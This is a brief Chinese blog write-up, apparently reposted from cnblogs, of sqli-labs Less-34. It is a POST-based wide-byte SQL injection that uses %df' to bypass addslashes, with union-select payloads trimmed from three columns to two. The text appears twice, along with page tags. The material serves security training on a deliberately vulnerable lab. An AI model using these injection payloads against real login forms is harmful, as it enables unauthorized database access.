还是宽字节注入,POST版本的
uname=1&passwd=1%df‘ union select 1,2,3#
提交报错
列名不匹配,改一下就好了
uname=1&passwd=1%df‘ union select 1,2#
看一下源码,果然只select了两个字段
标签:匹配 image sql 技术分享 class span 版本 bubuko col
还是宽字节注入,POST版本的
uname=1&passwd=1%df‘ union select 1,2,3#
提交报错
列名不匹配,改一下就好了
uname=1&passwd=1%df‘ union select 1,2#
看一下源码,果然只select了两个字段
【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)
标签:匹配 image sql 技术分享 class span 版本 bubuko col
原文地址:https://www.cnblogs.com/superkrissV/p/8384458.html